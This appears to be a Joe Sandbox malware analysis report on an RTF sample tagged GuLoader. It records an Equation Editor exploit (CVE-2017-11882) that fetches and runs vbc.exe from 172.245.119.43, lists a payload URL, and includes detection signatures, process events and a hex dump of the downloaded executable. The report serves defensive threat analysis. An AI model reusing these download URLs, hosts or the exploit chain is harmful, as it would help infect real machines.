Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
lUkTchBi9r

Overview

General Information

Sample Name:lUkTchBi9r (renamed file extension from none to rtf)
Analysis ID:561321
MD5:4f51af14d712b6214c64090a79cb228b
SHA1:6bf1f72ade16239db6cc14d13191b11278308dd6
SHA256:7a3188668cd5ef9ed4e17d9f41a9b5eb22690eb9d6151caf9933f121bfbcedbe
Tags:rtf
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Tries to detect virtualization through RDTSC time measurements
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormal high CPU Usage
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 2692 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 1528 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2788 cmdline: "C:\Users\Public\vbc.exe" MD5: 82C5CDDE9DF0A76E2933C1CD8BFC7887)
  • cleanup
{"Payload URL": "https://bangladeshshoecity.com/images/2w"}
SourceRuleDescriptionAuthorStrings
00000003.00000002.688715798.0000000003790000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

    Exploits

    barindex
    Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 172.245.119.43, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1528, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1528, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

    System Summary

    barindex
    Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1528, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 2788
    Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1528, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 2788

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: 00000003.00000002.688715798.0000000003790000.00000040.00000800.00020000.00000000.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://bangladeshshoecity.com/images/2w"}
    Source: lUkTchBi9r.rtfVirustotal: Detection: 53%Perma Link
    Source: lUkTchBi9r.rtfReversingLabs: Detection: 51%
    Source: lUkTchBi9r.rtfAvira: detected
    Source: http://172.245.119.43/344/vbc.exeAvira URL Cloud: Label: malware
    Source: http://172.245.119.43/344/vbc.exeVirustotal: Detection: 11%Perma Link
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{B32AB2E9-05F1-4F55-B3EB-076D90494645}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeVirustotal: Detection: 31%Perma Link
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeReversingLabs: Detection: 21%
    Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 21%

    Exploits

    barindex
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exeJump to behavior
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: C:\Users\Public\vbc.exeCode function: 3_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,3_2_00405C49
    Source: C:\Users\Public\vbc.exeCode function: 3_2_00406873 FindFirstFileW,FindClose,3_2_00406873
    Source: C:\Users\Public\vbc.exeCode function: 3_2_0040290B FindFirstFileW,3_2_0040290B
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.245.119.43:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.245.119.43:80

    Networking

    barindex
    Source: Malware configuration extractorURLs: https://bangladeshshoecity.com/images/2w
    Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
    Source: Joe Sandbox ViewIP Address: 172.245.119.43 172.245.119.43
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 27 Jan 2022 09:55:12 GMTServer: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27Last-Modified: Sun, 23 Jan 2022 15:50:13 GMTETag: "17590-5d641cec22e87"Accept-Ranges: bytesContent-Length: 95632Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 08 81 e9 50 66 d2 e9 50 66 d2 e9 50 66 d2 2a 5f 39 d2 eb 50 66 d2 e9 50 67 d2 4c 50 66 d2 2a 5f 3b d2 e6 50 66 d2 bd 73 56 d2 e3 50 66 d2 2e 56 60 d2 e8 50 66 d2 52 69 63 68 e9 50 66 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 5a 9b 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 6a 00 00 00 da 02 00 00 08 00 00 2d 35 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 d0 04 00 00 04 00 00 22 da 01 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 86 00 00 a0 00 00 00 00 c0 04 00 28 0e 00 00 00 00 00 00 00 00 00 00 d8 60 01 00 b8 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 97 68 00 00 00 10 00 00 00 6a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a6 14 00 00 00 80 00 00 00 16 00 00 00 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 b0 02 00 00 a0 00 00 00 06 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 60 01 00 00 60 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 28 0e 00 00 00 c0 04 00 00 10 00 00 00 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: global trafficHTTP traffic detected: GET /344/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.119.43Connection: Keep-Alive
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.43
    Source: vbc.exe.1.dr, vbc[1].exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
    Source: vbc.exe.1.dr, vbc[1].exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
    Source: vbc.exe.1.dr, vbc[1].exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
    Source: vbc.exe.1.dr, vbc[1].exe.1.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
    Source: vbc.exe.1.dr, vbc[1].exe.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
    Source: vbc.exe.1.dr, vbc[1].exe.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
    Source: vbc.exe, 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vbc.exe, 00000003.00000000.418770944.000000000040A000.00000008.00000001.01000000.00000003.sdmp, vbc.exe.1.dr, vbc[1].exe.1.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: vbc.exe.1.dr, vbc[1].exe.1.drString found in binary or memory: http://ocsp.digicert.com0C
    Source: vbc.exe.1.dr, vbc[1].exe.1.drString found in binary or memory: http://ocsp.digicert.com0O
    Source: vbc.exe.1.dr, vbc[1].exe.1.drString found in binary or memory: http://www.digicert.com/CPS0
    Source: vbc.exe.1.dr, vbc[1].exe.1.drString found in binary or memory: https://www.digicert.com/CPS0
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{5E110DC0-3FB3-4FCA-B33A-F5DC88334AB4}.tmpJump to behavior
    Source: global trafficHTTP traffic detected: GET /344/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.119.43Connection: Keep-Alive
    Source: C:\Users\Public\vbc.exeCode function: 3_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,3_2_004056DE

    System Summary

    barindex
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Users\Public\vbc.exeCode function: 3_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,3_2_0040352D
    Source: C:\Users\Public\vbc.exeCode function: 3_2_0040755C3_2_0040755C
    Source: C:\Users\Public\vbc.exeCode function: 3_2_00406D853_2_00406D85
    Source: C:\Users\Public\vbc.exeCode function: 3_2_73281BFF3_2_73281BFF
    Source: C:\Users\Public\vbc.exeCode function: 3_2_037956943_2_03795694
    Source: C:\Users\Public\vbc.exeCode function: 3_2_037975643_2_03797564
    Source: C:\Users\Public\vbc.exeCode function: 3_2_037927493_2_03792749
    Source: C:\Users\Public\vbc.exeCode function: 3_2_03793FE23_2_03793FE2
    Source: C:\Users\Public\vbc.exeCode function: 3_2_0379279C3_2_0379279C
    Source: C:\Users\Public\vbc.exeCode function: 3_2_03793B8F3_2_03793B8F
    Source: C:\Users\Public\vbc.exeCode function: 3_2_037959823_2_03795982
    Source: C:\Users\Public\vbc.exeCode function: 3_2_037976583_2_03797658
    Source: C:\Users\Public\vbc.exeCode function: 3_2_037978393_2_03797839
    Source: C:\Users\Public\vbc.exeCode function: 3_2_0379521F3_2_0379521F
    Source: C:\Users\Public\vbc.exeCode function: 3_2_03794EDA3_2_03794EDA
    Source: C:\Users\Public\vbc.exeCode function: 3_2_03793CAF3_2_03793CAF
    Source: C:\Users\Public\vbc.exeCode function: 3_2_03795694 NtAllocateVirtualMemory,3_2_03795694
    Source: ~WRF{B32AB2E9-05F1-4F55-B3EB-076D90494645}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: C:\Users\Public\vbc.exeProcess Stats: CPU usage > 98%
    Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
    Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
    Source: lUkTchBi9r.rtfVirustotal: Detection: 53%
    Source: lUkTchBi9r.rtfReversingLabs: Detection: 51%
    Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
    Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
    Source: C:\Users\Public\vbc.exeCode function: 3_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,3_2_0040352D
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$kTchBi9r.rtfJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE83C.tmpJump to behavior
    Source: classification engineClassification label: mal100.troj.expl.evad.winRTF@4/12@0/1
    Source: C:\Users\Public\vbc.exeCode function: 3_2_004021AA CoCreateInstance,3_2_004021AA
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\Public\vbc.exeCode function: 3_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,3_2_0040498A
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: ~WRF{B32AB2E9-05F1-4F55-B3EB-076D90494645}.tmp.0.drInitial sample: OLE indicators vbamacros = False

    Data Obfuscation

    barindex
    Source: Yara matchFile source: 00000003.00000002.688715798.0000000003790000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Users\Public\vbc.exeCode function: 3_2_732830C0 push eax; ret 3_2_732830EE
    Source: C:\Users\Public\vbc.exeCode function: 3_2_73281BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,3_2_73281BFF
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\nsb88D0.tmp\System.dllJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

    Boot Survival

    barindex
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
